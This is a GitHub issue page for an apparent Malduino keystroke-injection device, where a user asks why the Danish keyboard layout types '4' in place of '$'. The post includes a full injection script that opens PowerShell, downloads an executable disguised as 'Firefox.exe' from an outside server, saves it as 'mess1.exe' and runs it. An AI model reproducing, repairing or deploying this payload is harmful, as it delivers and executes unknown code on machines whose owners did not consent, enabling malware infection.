Skip to content

Problem with keyboard language #48

Description

@TermiTrack

I have some issues with the Danish keyboard language with the symbol ( $ ) probally others too.
I have read some of these issues on this page but could not find any solution for my problem.

I have a script which contains the symbol ( $ ) and when it's pressed by the Malduino it writes 4 instead of $.
I'm not sure why it's giving me issues cuz when i look into the code of the elite.ino it apperas to be supported.

If there is no way around this do anyone know a replacement for the symbol in this script:

REM Windows 10: Poweshell administrator download and execute file
DELAY 5000
GUI
DELAY 200
STRING Windows PowerShell
DELAY 200
ENTER
DELAY 3000
STRING $down = New-Object System.Net.WebClient; $url = 'https://srv-store6.dwn/download/FqiiSM/Firefox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
DELAY 1000
ENTER

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions